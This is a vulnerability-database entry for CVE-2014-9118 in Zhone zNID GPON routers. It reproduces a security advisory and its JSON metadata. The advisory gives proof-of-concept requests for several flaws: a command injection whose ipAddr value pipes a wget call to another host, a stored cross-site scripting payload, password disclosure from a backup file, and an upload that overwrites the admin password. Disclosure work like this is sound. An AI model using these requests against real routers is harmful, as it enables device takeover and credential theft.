var-201710-0139
Vulnerability from variot
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd. Zhone zNID GPON 2426A Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Zhone Technologies zNID GPON 24xx, 24xxA, 42xx, 42xxA, 26xx and 28xx are router products of Zhone Technologies, USA. Multiple ZHONE Routers are prone to following security vulnerabilities: 1. Multiple HTML injection vulnerabilities 2. An information disclosure vulnerability 3. An authorization-bypass vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A remote command-execution vulnerability 6. A privilege-escalation vulnerability Successful exploits allow attacker-supplied HTML and script code to run in the context of the affected browser potentially allowing attackers to steal cookie-based authentication credentials, control how the site is rendered to the user, execute arbitrary commands, gain access to sensitive information, gain elevated privileges, execute arbitrary code and bypass security restrictions and perform unauthorized actions. Note: Reportedly these issues affect multiple ZHONE routers running firmware versions prior to S3.0.501 and fixed in S3.1.241, but this has not been confirmed by the vendor. Vantage Point Security Advisory 2015-002 ========================================
Title: Multiple Vulnerabilities found in ZHONE
Vendor: Zhone
Vendor URL: http://www.zhone.com
Device Model: ZHONE ZNID GPON 2426A
(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
Versions affected: < S3.0.501
Severity: Low to medium
Vendor notified: Yes
Reported:
Public release:
Author: Lyon Yang
Summary:
1. Insecure Direct Object Reference (CVE-2014-8356)
The administrative web application does not enforce authorization on the server side. User access is restricted via Javascript only, by display available functions for each particular user based on their privileges. Low privileged users of the Zhone Router can therefore gain unrestricted access to administrative functionality, e.g. by modifying the javascript responses returned by the Zhone web server.
Affected URL: http://
To demonstrate the issue:
-
Set your browser proxy to Burp Suite
-
Add the following option to "Match and Replace". Match for the string 'admin' and replace with your low privilege user:
-
Login to the Zhone Administrative via your browser with Burp Proxy and you will have full administrative access via the Zhone Web Administrative Portal.
2. Admin Password Disclosure (CVE-2014-8357)
Any low-privileged user of the ZHONE Router Web Administrative Portal can obtain all users passwords stored in the ZHONE web server. The ZHONE router uses Base64 encoding to store all users passwords for logging in to the Web Administrative portal. As these passwords are stored in the backup file, a malicious user can obtain all account passwords.
Affected URL: http://
-
Browse to http://192.168.1.1/backupsettings.html:
-
"View Source" and take note of the sessionKey:
-
Browse to http://
/backupsettings.conf?action=getConfig&sessionKey= . and all user account passwords will be returned.
Affected URL:
/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3
Affected Parameter:
ipAddr
4. Stored Cross-Site Scripting
The zhnsystemconfig.cgi script is vulnerable to a stored cross-site scripting attack.
Sample HTTP Request:
GET /zhnsystemconfig.cgi?snmpSysName=ZNID24xxA- Route&snmpSysContact=Zhone%20Global%20Support&snmpSysLocation=www.zhone.com %3Cscript%3Ealert(1)%3C/script%3E&sessionKey=1853320716 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnsystemconfig.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Authorization: Basic (Base 64 Encoded:
Affected Parameters: 1. snmpSysName 2. snmpSysLocation 3. snmpSysContact
5. Privilege Escalation via Direct Object Reference to Upload Settings Functionality
A low-privileged user can patch the router settings via the /uploadsettings.cgi page. With this functionality, the malicious attacker is able to patch the admin and support password, hence gaining full administrative access to the Zhone router.
Sample POST Request:
POST /uploadsettings.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------- 75010019812050198961998600862
Authorization: Basic (Base 64 Encoded:
-----------------------------75010019812050198961998600862 Content-Disposition: form-data; name="filename"; filename="backupsettings.conf" Content-Type: config/conf
Fix Information:
Upgrade to version S3.1.241
Timeline:
2014/10: Issues No. (1 & 2) reported to Zhone 2014/12: Issues No. (1 & 3) reported to Zhone 2015/01: Requested Update 2015/01: Fixes Provided by Zhone, but vulnerabilities still not fixed 2015/02: Sent P.O.C Video to show how vulnerabilities work 2015/03: Fixes Provided by Zhone, but vulnerabilities still not fixed 2015/04: Requested Update 2015/04: Issues No. (4 & 5) reported to Zhone 2015/06: Requested Update 2015/08: Requested Update 2015/09: Fixes for issue 1, 4 and 5 completed by Zhone 2015/10: Confirm that all issues has been fixed
About Vantage Point Security:
Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture.
https://www.vantagepoint.sg/ office[at]vantagepoint[dot]sg
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201710-0139",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "znid 2426a",
"scope": "eq",
"trust": 1.6,
"vendor": "dasanzhone",
"version": null
},
{
"model": "znid gpon 2426a",
"scope": "lt",
"trust": 0.8,
"vendor": "dasan zhone",
"version": "s3.0.501"
},
{
"model": "znid gpon",
"scope": "eq",
"trust": 0.6,
"vendor": "zhone",
"version": "24xx"
},
{
"model": "znid gpon 24xxa",
"scope": null,
"trust": 0.6,
"vendor": "zhone",
"version": null
},
{
"model": "znid gpon",
"scope": "eq",
"trust": 0.6,
"vendor": "zhone",
"version": "42xx"
},
{
"model": "znid gpon 42xxa",
"scope": null,
"trust": 0.6,
"vendor": "zhone",
"version": null
},
{
"model": "znid gpon",
"scope": "eq",
"trust": 0.6,
"vendor": "zhone",
"version": "26xx"
},
{
"model": "znid gpon",
"scope": "eq",
"trust": 0.6,
"vendor": "zhone",
"version": "28xx."
},
{
"model": "znid gpon 4224a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 4222a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2804p",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2648t",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2648p",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2648a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2645p",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2645a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2644p",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2644a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2628t",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2628p",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2628a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2625p",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2625a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2624p",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2624a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2427a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2426a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2425a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2424a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2403a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
},
{
"model": "znid gpon 2402a",
"scope": "eq",
"trust": 0.3,
"vendor": "zhone",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07264"
},
{
"db": "BID",
"id": "77038"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008410"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-721"
},
{
"db": "NVD",
"id": "CVE-2014-9118"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasanzhone:znid_2426a_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008410"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Lyon Yang",
"sources": [
{
"db": "BID",
"id": "77038"
},
{
"db": "PACKETSTORM",
"id": "133921"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-721"
}
],
"trust": 1.0
},
"cve": "CVE-2014-9118",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2014-9118",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-07264",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-77063",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2014-9118",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-9118",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-9118",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2015-07264",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201510-721",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-77063",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07264"
},
{
"db": "VULHUB",
"id": "VHN-77063"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008410"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-721"
},
{
"db": "NVD",
"id": "CVE-2014-9118"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd. Zhone zNID GPON 2426A Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Zhone Technologies zNID GPON 24xx, 24xxA, 42xx, 42xxA, 26xx and 28xx are router products of Zhone Technologies, USA. Multiple ZHONE Routers are prone to following security vulnerabilities:\n1. Multiple HTML injection vulnerabilities\n2. An information disclosure vulnerability\n3. An authorization-bypass vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A remote command-execution vulnerability\n6. A privilege-escalation vulnerability\nSuccessful exploits allow attacker-supplied HTML and script code to run in the context of the affected browser potentially allowing attackers to steal cookie-based authentication credentials, control how the site is rendered to the user, execute arbitrary commands, gain access to sensitive information, gain elevated privileges, execute arbitrary code and bypass security restrictions and perform unauthorized actions. \nNote: Reportedly these issues affect multiple ZHONE routers running firmware versions prior to S3.0.501 and fixed in S3.1.241, but this has not been confirmed by the vendor. Vantage Point Security Advisory 2015-002\n========================================\n\nTitle: Multiple Vulnerabilities found in ZHONE\nVendor: Zhone\nVendor URL: http://www.zhone.com\nDevice Model: ZHONE ZNID GPON 2426A\n(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)\nVersions affected: \u003c S3.0.501\nSeverity: Low to medium\nVendor notified: Yes\nReported: \nPublic release: \nAuthor: Lyon Yang \u003clyon[at]vantagepoint[dot]sg\u003e \u003clyon.yang.s[at]gmail[dot]com\u003e\n\nSummary:\n--------\n\n1. Insecure Direct Object Reference (CVE-2014-8356)\n---------------------------------------------------\n\nThe administrative web application does not enforce authorization on the server side. User access is restricted via Javascript only, by display available functions for each particular user based on their privileges. Low privileged users of the Zhone Router can therefore gain unrestricted access to administrative functionality, e.g. by modifying the javascript responses returned by the Zhone web server. \n\nAffected URL: http://\u003cRouter URL\u003e/menuBcm.js\n\nTo demonstrate the issue:\n\n1. Set your browser proxy to Burp Suite\n\n2. Add the following option to \"Match and Replace\". Match for the string \u0027admin\u0027 and replace with your low privilege user:\n\n3. Login to the Zhone Administrative via your browser with Burp Proxy and you will have full administrative access via the Zhone Web Administrative Portal. \n\n\n2. Admin Password Disclosure (CVE-2014-8357)\n--------------------------------------------\n\nAny low-privileged user of the ZHONE Router Web Administrative Portal can obtain all users passwords stored in the ZHONE web server. The ZHONE router uses Base64 encoding to store all users passwords for logging in to the Web Administrative portal. As these passwords are stored in the backup file, a malicious user can obtain all account passwords. \n\nAffected URL: http://\u003cRouter URL\u003e/\n\n1. Browse to http://192.168.1.1/backupsettings.html:\n\n2. \"View Source\" and take note of the sessionKey:\n\n3. Browse to http://\u003cRouter\nURL\u003e/backupsettings.conf?action=getConfig\u0026sessionKey=\u003cEnter Session\nKey Here\u003e. and all user account passwords will be returned. \n\n\n3. \n\nAffected URL:\n\n/zhnping.cmd?\u0026test=traceroute\u0026sessionKey=985703201\u0026ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here\u0026ttl=30\u0026wait=3\u0026queries=3\n\nAffected Parameter:\n\nipAddr\n\n\n4. Stored Cross-Site Scripting\n---------------------------------------------------------------------------------------\n\nThe zhnsystemconfig.cgi script is vulnerable to a stored cross-site scripting attack. \n\nSample HTTP Request:\n\nGET /zhnsystemconfig.cgi?snmpSysName=ZNID24xxA- Route\u0026snmpSysContact=Zhone%20Global%20Support\u0026snmpSysLocation=www.zhone.com %3Cscript%3Ealert(1)%3C/script%3E\u0026sessionKey=1853320716 HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/zhnsystemconfig.html\nCookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0 \nAuthorization: Basic (Base 64 Encoded:\u003cUSER:PASSWORD\u003e)\nConnection: keep-alive\n\nAffected Parameters:\n1. snmpSysName\n2. snmpSysLocation \n3. snmpSysContact\n\n\n5. Privilege Escalation via Direct Object Reference to Upload Settings Functionality\n---------------------------------------------------------------------------------------\n\nA low-privileged user can patch the router settings via the /uploadsettings.cgi page. With this functionality, the malicious attacker is able to patch the admin and support password, hence gaining full administrative access to the Zhone router. \n\nSample POST Request:\n\nPOST /uploadsettings.cgi HTTP/1.1\nHost: 192.168.1.1\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/updatesettings.html\nCookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0\nConnection: keep-alive\nContent-Type: multipart/form-data; boundary=--------------------------- 75010019812050198961998600862\nAuthorization: Basic (Base 64 Encoded:\u003cUSER:PASSWORD\u003e)\nContent-Length: 88438\n\n-----------------------------75010019812050198961998600862\nContent-Disposition: form-data; name=\"filename\"; filename=\"backupsettings.conf\" Content-Type: config/conf\n\u003c?xml version=\"1.0\"?\u003e \u003cDslCpeConfig version=\"3.2\"\u003e\n... \n\u003cAdminPassword\u003ednFmMUJyM3oB\u003c/AdminPassword\u003e\n... \n--- Configuration File Contents ---\n\u003c/DslCpeConfig\u003e\n\n\nFix Information:\n----------------\n\nUpgrade to version S3.1.241\n\n\nTimeline:\n---------\n\n2014/10: Issues No. (1 \u0026 2) reported to Zhone\n2014/12: Issues No. (1 \u0026 3) reported to Zhone\n2015/01: Requested Update\n2015/01: Fixes Provided by Zhone, but vulnerabilities still not fixed\n2015/02: Sent P.O.C Video to show how vulnerabilities work\n2015/03: Fixes Provided by Zhone, but vulnerabilities still not fixed\n2015/04: Requested Update\n2015/04: Issues No. (4 \u0026 5) reported to Zhone\n2015/06: Requested Update\n2015/08: Requested Update\n2015/09: Fixes for issue 1, 4 and 5 completed by Zhone\n2015/10: Confirm that all issues has been fixed\n\n\nAbout Vantage Point Security:\n--------------------\n\nVantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. \n\nhttps://www.vantagepoint.sg/\noffice[at]vantagepoint[dot]sg\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-9118"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008410"
},
{
"db": "CNVD",
"id": "CNVD-2015-07264"
},
{
"db": "BID",
"id": "77038"
},
{
"db": "VULHUB",
"id": "VHN-77063"
},
{
"db": "PACKETSTORM",
"id": "133921"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-77063",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-77063"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-9118",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "133921",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "38453",
"trust": 1.7
},
{
"db": "BID",
"id": "77038",
"trust": 1.5
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008410",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201510-721",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2015-07264",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-77063",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07264"
},
{
"db": "VULHUB",
"id": "VHN-77063"
},
{
"db": "BID",
"id": "77038"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008410"
},
{
"db": "PACKETSTORM",
"id": "133921"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-721"
},
{
"db": "NVD",
"id": "CVE-2014-9118"
}
]
},
"id": "VAR-201710-0139",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07264"
},
{
"db": "VULHUB",
"id": "VHN-77063"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07264"
}
]
},
"last_update_date": "2024-11-23T22:26:37.726000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.zhone.com"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008410"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-77063"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008410"
},
{
"db": "NVD",
"id": "CVE-2014-9118"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://packetstormsecurity.com/files/133921/zhone-insecure-reference-password-disclosure-command-injection.html"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/38453/"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2015/oct/57"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/77038"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/536663/100/0/threaded"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9118"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9118"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/536663/100/0/threaded"
},
{
"trust": 0.3,
"url": "http://www.forbes.com/sites/davelewis/2015/02/26/singapore-cert-warns-of-vulnerable-routers/"
},
{
"trust": 0.3,
"url": "http://www.zhone.com/"
},
{
"trust": 0.3,
"url": "http://seclists.org/bugtraq/2015/oct/62"
},
{
"trust": 0.3,
"url": "http://seclists.org/bugtraq/2015/oct/59"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/zhnsystemconfig.html"
},
{
"trust": 0.1,
"url": "http://www.zhone.com"
},
{
"trust": 0.1,
"url": "https://www.vantagepoint.sg/"
},
{
"trust": 0.1,
"url": "http://\u003crouter"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/updatesettings.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-8356"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-8357"
},
{
"trust": 0.1,
"url": "http://192.168.1.17/l00per_was_here\u0026ttl=30\u0026wait=3\u0026queries=3"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/backupsettings.html:"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07264"
},
{
"db": "VULHUB",
"id": "VHN-77063"
},
{
"db": "BID",
"id": "77038"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008410"
},
{
"db": "PACKETSTORM",
"id": "133921"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-721"
},
{
"db": "NVD",
"id": "CVE-2014-9118"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-07264"
},
{
"db": "VULHUB",
"id": "VHN-77063"
},
{
"db": "BID",
"id": "77038"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008410"
},
{
"db": "PACKETSTORM",
"id": "133921"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-721"
},
{
"db": "NVD",
"id": "CVE-2014-9118"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-11-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-07264"
},
{
"date": "2017-10-17T00:00:00",
"db": "VULHUB",
"id": "VHN-77063"
},
{
"date": "2015-10-12T00:00:00",
"db": "BID",
"id": "77038"
},
{
"date": "2017-11-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008410"
},
{
"date": "2015-10-12T14:22:22",
"db": "PACKETSTORM",
"id": "133921"
},
{
"date": "2015-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201510-721"
},
{
"date": "2017-10-17T16:29:00.377000",
"db": "NVD",
"id": "CVE-2014-9118"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-11-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-07264"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-77063"
},
{
"date": "2015-10-12T00:00:00",
"db": "BID",
"id": "77038"
},
{
"date": "2017-11-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008410"
},
{
"date": "2017-10-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201510-721"
},
{
"date": "2024-11-21T02:20:14.940000",
"db": "NVD",
